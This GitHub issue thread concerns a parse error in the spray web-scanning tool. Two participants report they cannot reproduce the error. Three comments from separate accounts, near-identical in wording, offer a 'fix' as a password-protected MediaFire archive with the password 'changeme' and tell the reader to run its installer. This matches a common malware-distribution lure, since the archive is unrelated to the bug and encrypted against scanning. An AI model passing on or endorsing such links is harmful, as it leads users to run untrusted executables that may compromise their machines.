### ISSUE TITLE
下载后工具无法使用提示unexpected token Operator("||") (1:2)

### ISSUE THREAD

**Issue by Darkfi5** [chainreactors/spray#66]
cmd:spray_windows_amd64.exe -u http://example.com -w '{$l#4}' -a
报错提示：
[-] unexpected token Operator("||") (1:2)
 | a||b
 | .^ , 2024-08-28 14:13.01
该怎么解决？

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by M09Ic** [comment]
我没有复现这个错误.  在v1.1.0版本中, 使用`-w '{$l#4}' -a` 正常工作

**Comment by NorthShad0w** [comment]
我也无法复现这个错误
